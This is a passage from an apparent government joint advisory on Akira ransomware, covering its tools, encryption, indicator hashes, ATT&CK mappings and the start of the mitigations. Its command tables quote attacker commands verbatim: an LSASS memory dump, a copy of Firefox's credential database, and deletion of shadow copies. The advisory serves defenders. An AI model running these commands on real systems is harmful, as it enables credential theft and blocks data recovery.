<p>According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting[<a href="https://www.crowdstrike.com/cybersecurity-101/kerberoasting/" title="KERBEROASTING ATTACKS">5</a>], to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS) [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>]<a>.</a>[<a href="https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/" title="Akira, again: The ransomware that keeps on taking">6</a>] Akira threat actors also use credential scraping tools [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/" title="OS Credential Dumping">T1003</a>] like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes [<a href="https://attack.mitre.org/versions/v14/techniques/T1016/" title="System Network Configuration Discovery">T1016</a>] and <code>net</code> Windows commands are used to identify domain controllers [<a href="https://attack.mitre.org/versions/v14/techniques/T1018/" title="Remote System Discovery">T1018</a>] and gather information on domain trust relationships [<a href="https://attack.mitre.org/versions/v14/techniques/T1482" title="Domain Trust Discovery">T1482</a>].</p>
<p>See Table 1 for a descriptive listing of these tools.</p>
<h4><strong>Defense Evasion</strong></h4>
<p>Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific “Megazord” ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, “Akira_v2”).</p>
<p>As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver[<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira" title="Ransomware Spotlight: Akira">4</a>] and terminate antivirus-related processes [<a href="https://attack.mitre.org/versions/v14/techniques/T1562/001" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>].</p>
<h4><strong>Exfiltration and Impact</strong></h4>
<p>Akira threat actors leverage tools such as FileZilla, WinRAR [<a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a>], WinSCP, and RClone to exfiltrate data [<a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a>]. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega [<a href="https://attack.mitre.org/versions/v14/techniques/T1537" title="Transfer Data to Cloud Account">T1537</a>] to connect to exfiltration servers.</p>
<p>Akira threat actors use a double-extortion model [<a href="https://attack.mitre.org/versions/v14/techniques/T1657/" title="Financial Theft">T1657</a>] and encrypt systems [<a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>] after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via <code>a .onion</code> URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting.</p>
<h4><strong>Encryption</strong></h4>
<p>Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange [<a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a <code>.akira</code> or <code>.powerranges</code> extension. To further inhibit system recovery, Akira’s encryptor (<code>w.exe</code>) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems [<a href="https://attack.mitre.org/versions/v14/techniques/T1490" title="Inhibit System Recovery">T1490</a>]. Additionally, a ransom note named <code>fn.txt</code> appears in both the root directory (<code>C:</code>) and each users’ home directory (<code>C:\Users</code>).</p>
<p>Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it’s written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including:</p>
<ul>
<li><code>-p --encryption_path (targeted file/folder paths)</code></li>
<li><code>-s --share_file (targeted network drive path)</code></li>
<li><code>-n --encryption_percent (percentage of encryption)</code></li>
<li><code>--fork (create a child process for encryption</code></li>
</ul>
<p>The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using “<code>vmonly</code>” and the ability to stop running virtual machines with “<code>stopvm</code>” functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension “<code>akiranew</code>” or add a ransom note named “<code>akiranew.txt</code>” in directories where files were encrypted with the new nomenclature.</p>
<h4><strong>Leveraged Tools</strong></h4>
<p>Table 1 lists publicly available tools and applications Akira threat actors have used, including legitimate tools repurposed for their operations. Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 1: Tools Leveraged by Akira Ransomware Actors</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Name</strong></th>
<th role="columnheader"><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://attack.mitre.org/versions/v14/software/S0552/" title="AdFind">AdFind</a></td>
<td><code>AdFind.exe</code> is used to query and retrieve information from Active Directory.</td>
</tr>
<tr>
<td>Advanced IP Scanner</td>
<td>A network scanner is used to locate all the computers on a network and conduct a scan of their ports. The program shows all network devices, gives access to shared folders, and provides remote control of computers (via RDP and Radmin).</td>
</tr>
<tr>
<td>AnyDesk</td>
<td>A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [<a href="https://attack.mitre.org/versions/v14/techniques/T1219" title="Remote Access Software">T1219</a>]. AnyDesk also supports remote file transfer.</td>
</tr>
<tr>
<td><a href="https://attack.mitre.org/software/S0349" title="LaZagne">LaZagne</a></td>
<td>Allows users to recover stored passwords on Windows, Linux, and OSX systems.</td>
</tr>
<tr>
<td>PCHunter64</td>
<td>A tool used to acquire detailed process and system information<a> [</a><a href="https://attack.mitre.org/versions/v14/techniques/T1082/" title="System Information Discovery">T1082</a>].[<a href="https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/" title="Akira Ransomware is “bringin’ 1988 back”">7</a>]</td>
</tr>
<tr>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">PowerShell</a></td>
<td>A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</td>
</tr>
<tr>
<td><a href="https://attack.mitre.org/versions/v14/software/S0002/" title="Mimikatz">Mimikatz</a></td>
<td>Allows users to view and save authentication credentials such as Kerberos tickets.</td>
</tr>
<tr>
<td><a href="https://attack.mitre.org/versions/v14/software/S0508/" title="ngrok">Ngrok</a></td>
<td>A reverse proxy tool [<a href="https://attack.mitre.org/versions/v14/techniques/T1090/" title="Proxy">T1090</a>] used to create a secure tunnel to servers behind firewalls or local machines without a public IP address.</td>
</tr>
<tr>
<td><a href="https://attack.mitre.org/software/S1040" title="Rclone">RClone</a></td>
<td>A command line program used to sync files with cloud storage services [<a href="https://attack.mitre.org/versions/v14/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>] such as Mega.</td>
</tr>
<tr>
<td>SoftPerfect</td>
<td>A network scanner (<code>netscan.exe</code>) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters.</td>
</tr>
<tr>
<td>WinRAR</td>
<td>Used to split compromised data into segments and to compress [<a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a>] files into <code>.RAR</code> format for exfiltration.</td>
</tr>
<tr>
<td>WinSCP</td>
<td>Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Akira threat actors have used it to transfer data [<a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a>] from a compromised network to actor-controlled accounts.</td>
</tr>
</tbody>
</table>
<h4><strong>Indicators of Compromise</strong></h4>
<p><strong>Disclaimer:</strong> Investigation or vetting of these indicators is recommended prior to taking action, such as blocking.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 2a: Malicious Files Affiliated with Akira Ransomware</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>File Name</strong></th>
<th role="columnheader"><strong>Hash (SHA-256)</strong></th>
<th role="columnheader"><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>w.exe</td>
<td>d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca</td>
<td>Akira ransomware</td>
</tr>
<tr>
<td>Win.exe</td>
<td>dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e</td>
<td>Akira ransomware encryptor</td>
</tr>
<tr>
<td>AnyDesk.exe</td>
<td>bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138</td>
<td>Remote desktop application</td>
</tr>
<tr>
<td>Gcapi.dll</td>
<td>73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf</td>
<td>DLL file that assists with the execution of AnyDesk.exe</td>
</tr>
<tr>
<td>Sysmon.exe</td>
<td>1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386</td>
<td>Ngrok tool for persistence</td>
</tr>
<tr>
<td>Config.yml</td>
<td>Varies by use</td>
<td>Ngrok configuration file</td>
</tr>
<tr>
<td>Rclone.exe</td>
<td>aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9</td>
<td>Exfiltration tool</td>
</tr>
<tr>
<td>Winscp.rnd</td>
<td>7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4</td>
<td>Network file transfer program</td>
</tr>
<tr>
<td>WinSCP-6.1.2-Setup.exe</td>
<td>36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c</td>
<td>Network file transfer program</td>
</tr>
<tr>
<td>Akira_v2</td>
<td>
<p>3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75</p>
<p>0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c</p>
</td>
<td>Akira_v2 ransomware</td>
</tr>
<tr>
<td>Megazord</td>
<td>
<p>ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc</p>
<p>dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198</p>
<p>131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07</p>
<p>9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c</p>
<p>9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065</p>
<p>2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83</p>
<p>7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be</p>
<p>95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a</p>
<p>0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d</p>
<p>C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0</p>
</td>
<td>Akira “Megazord” ransomware</td>
</tr>
<tr>
<td>VeeamHax.exe</td>
<td>aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d</td>
<td>Plaintext credential leaking tool</td>
</tr>
<tr>
<td>Veeam-Get-Creds.ps1</td>
<td>18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88</td>
<td>PowerShell script for obtaining and decrypting accounts from Veeam servers</td>
</tr>
<tr>
<td>PowershellKerberos TicketDumper</td>
<td>5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32</td>
<td>Kerberos ticket dumping tool from LSA cache</td>
</tr>
<tr>
<td>sshd.exe</td>
<td>8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694</td>
<td>OpenSSH Backdoor</td>
</tr>
<tr>
<td>sshd.exe</td>
<td>8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694</td>
<td>OpenSSH Backdoor</td>
</tr>
<tr>
<td>ipscan-3.9.1-setup.exe</td>
<td>892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0</td>
<td>Network scanner that scans IP addresses and ports</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 2b: Malicious Files Affiliated with Akira Ransomware</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>File Name</strong></th>
<th role="columnheader"><strong>Hash (MD5)</strong></th>
<th role="columnheader"><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>winrar-x64-623.exe</td>
<td>7a647af3c112ad805296a22b2a276e7c</td>
<td>Network file transfer program</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 3a: Commands Affiliated with Akira Ransomware</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Persistence and Discovery</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>nltest /dclist: [<a href="https://attack.mitre.org/versions/v14/techniques/T1018/" title="Remote System Discovery">T1018</a>]</td>
</tr>
<tr>
<td>nltest /DOMAIN_TRUSTS [<a href="https://attack.mitre.org/versions/v14/techniques/T1482/" title="Domain Trust Discovery">T1482</a>]</td>
</tr>
<tr>
<td>net group “Domain admins” /dom [<a href="https://attack.mitre.org/versions/v14/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a>]</td>
</tr>
<tr>
<td>net localgroup “Administrators” /dom [<a href="https://attack.mitre.org/versions/v14/techniques/T1069/001/" title="Permission Groups Discovery: Local Groups">T1069.001</a>]</td>
</tr>
<tr>
<td>tasklist [<a href="https://attack.mitre.org/versions/v14/techniques/T1057/" title="Process Discovery">T1057</a>]</td>
</tr>
<tr>
<td>rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>]</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 3b: Commands Affiliated with Akira Ransomware</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Credential Access</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p>cmd.exe /Q /c esentutl.exe /y</p>
<p>"C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;firefox_profile_id&gt;.default-release\key4.db" /d</p>
<p>"C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;firefox_profile_id&gt;.default-release\key4.db.tmp”</p>
<p><strong>Note: </strong>Used for accessing Firefox data.</p>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 3c: Commands Affiliated with Akira Ransomware</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Impact</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" [<a href="https://attack.mitre.org/versions/v14/techniques/T1490/" title="Inhibit System Recovery">T1490</a>]</td>
</tr>
</tbody>
</table>
<h3><strong>MITRE ATT&amp;CK TACTICS AND TECHNIQUES</strong></h3>
<p>See Tables 4 -12 for all referenced Akira threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK® Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 4: Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a></td>
<td>Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access.</td>
</tr>
<tr>
<td>Exploit Public Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td>
<td>Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems.</td>
</tr>
<tr>
<td>External Remote Services</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a></td>
<td>Akira threat actors have used remote access services, such as RDP/VPN connection to gain initial access.</td>
</tr>
<tr>
<td>Phishing: Spearphishing Attachment </td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1566/001/" title="Phishing: Spearphishing Attachment">T1566.001</a></td>
<td>Akira threat actors use phishing emails with malicious attachments to gain access to networks.</td>
</tr>
<tr>
<td>Phishing: Spearphishing Link </td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1566/002/" title="Phishing: Spearphishing Link">T1566.002</a></td>
<td>Akira threat actors use phishing emails with malicious links to gain access to networks. </td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 5: Credential Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>OS Credential Dumping</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1003/" title="OS Credential Dumping">T1003</a></td>
<td>Akira threat actors use tools like Mimikatz and LaZagne to dump credentials.</td>
</tr>
<tr>
<td>
<p>OS Credential Dumping:</p>
<p>LSASS Memory</p>
</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a></td>
<td>Akira threat actors attempt to access credential material stored in the process memory of the LSASS.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 6: Discovery</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>System Network Configuration Discovery </td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1016/" title="System Network Configuration Discovery">T1016</a></td>
<td>Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure.</td>
</tr>
<tr>
<td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1082/" title="System Information Discovery">T1082</a></td>
<td>Akira threat actors use tools like PCHunter64 to acquire detailed process and system information.</td>
</tr>
<tr>
<td>Domain Trust Discovery</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1482" title="Domain Trust Discovery">T1482</a></td>
<td>Akira threat actors use the net Windows command to enumerate domain information.</td>
</tr>
<tr>
<td>Process Discovery</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1057/" title="Process Discovery">T1057</a></td>
<td>Akira threat actors use the <code>Tasklist</code> utility to obtain details on running processes via PowerShell.</td>
</tr>
<tr>
<td>Permission Groups Discovery: Local Groups</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1069/001/" title="Permission Groups Discovery: Local Groups">T1069.001</a></td>
<td>Akira threat actors use the <code>net localgroup /dom</code> to find local system groups and permission settings.</td>
</tr>
<tr>
<td>Permission Groups Discovery: Domain Groups </td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a></td>
<td>Akira threat actors use the <code>net group /domain</code> command to attempt to find domain level groups and permission settings.</td>
</tr>
<tr>
<td>Remote System Discovery</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1018/" title="Remote System Discovery">T1018</a></td>
<td>Akira threat actors use <code>nltest / dclist</code> to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 7: Persistence</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Create Account: Domain Account</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1136/002/" title="Create Account: Domain Account">T1136.002</a></td>
<td>Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 8: Defense Evasion</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Impair Defenses: Disable or Modify Tools</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1562/001" title="Impair Defenses: Disable or Modify Tools">T1562.001</a></td>
<td>Akira threat actors use BYOVD attacks to disable antivirus software.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 9: Command and Control</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Remote Access Software</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1219" title="Remote Access Software">T1219</a></td>
<td>Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems.</td>
</tr>
<tr>
<td>Proxy</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1090/" title="Proxy">T1090</a></td>
<td>Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data. </td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 10: Collection</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Archive Collected Data: Archive via Utility</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a></td>
<td>Akira threat actors use tools like WinRAR to compress files.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 11: Exfiltration</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration Over Alternative Protocol</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a></td>
<td>Akira threat actors use file transfer tools like WinSCP to transfer data.</td>
</tr>
<tr>
<td>Transfer Data to Cloud Account</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1537" title="Transfer Data to Cloud Account">T1537</a></td>
<td>Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfil servers they control.</td>
</tr>
<tr>
<td>Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a></td>
<td>Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data. </td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 12: Impact</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Date Encrypted for Impact</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a></td>
<td>Akira threat actors encrypt data on target systems to interrupt availability to system and network resources.</td>
</tr>
<tr>
<td>Inhibit System Recovery</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1490" title="Inhibit System Recovery">T1490</a></td>
<td>Akira threat actors delete volume shadow copies on Windows systems.</td>
</tr>
<tr>
<td>Financial Theft</td>
<td><a href="https://attack.mitre.org/versions/v14/techniques/T1657/" title="Financial Theft">T1657</a></td>
<td>Akira threat actors use a double-extortion model for financial gain.</td>
</tr>
</tbody>
</table>
<h3><strong>MITIGATIONS</strong></h3>
<h4><strong>Network Defenders</strong></h4>
<p>The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NetworkSegmentation2F" title="Network Segmentation (2.F)">CPG 2.F</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">2.R</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#IncidentResponseIRPlans2S" title="Incident Response (IR) Plans (2.S)">2.S</a>].</li>
<li><strong>Require all accounts</strong> with password logins (e.g., service accounts, admin accounts, and domain admin accounts) <strong>to comply</strong> with NIST’s <a href="https://pages.nist.gov/800-63-3/" target="_blank" title="https://pages.nist.gov/800-63-3/">standards</a>. In particular, require employees to use long passwords and consider not requiring recurring password changes, as these can weaken security [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#UniqueCredentials2C" title="Unique Credentials (2.C)">CPG 2.C</a>].</li>
<li><strong>Require multifactor authentication</strong> for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#PhishingResistantMultifactorAuthenticationMFA2H" title="Phishing-Resistant Multifactor Authentication (MFA) (2.H)">CPG 2.H</a>].</li>
<li><strong>Keep all operating systems, software, and firmware up to date.</strong> Timely patching is one of the most efficient and cost effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">known exploited vulnerabilities</a> in internet-facing systems. [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MitigatingKnownVulnerabilities1E" title="Mitigating Known Vulnerabilities (1.E)">CPG 1.E</a>].</li>
